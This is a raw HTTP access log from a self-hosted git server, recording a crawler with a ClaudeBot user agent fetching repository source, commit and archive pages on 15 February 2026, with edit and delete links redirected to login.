git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14282] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11289] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 11301] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 14432] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 9817] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/settings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/settings.json" -[15/Feb/2026:10:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16162] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 216.73.216.188] [Length 14655] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 11151] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11804] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 11144] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/$%7BgetInvestingUrl(symbol)%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13866] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 9929] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app" -[15/Feb/2026:10:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 9940] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" -[15/Feb/2026:10:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets" -[15/Feb/2026:10:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11279] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" -[15/Feb/2026:10:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 21522] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 11088] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 15715] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12216] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 9821] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 11176] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/services" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11354] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 10061] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.bundle" [Client 216.73.216.188] [Length 337818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 11893] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 25422] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 16442] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 216.73.216.188] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 9837] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/docker-compose.yml" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/types.ts" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=source" [Client 216.73.216.188] [Length 11928] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 216.73.216.188] [Length 10103] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 9830] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 216.73.216.188] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 216.73.216.188] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 216.73.216.188] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Services.tsx" -[15/Feb/2026:10:51:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Footer.tsx" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Contact.tsx" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 19641] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 216.73.216.188] [Length 10954] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/vite.config.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/About.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/vite.config.ts" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/About.tsx" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Hero.tsx" -[15/Feb/2026:10:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 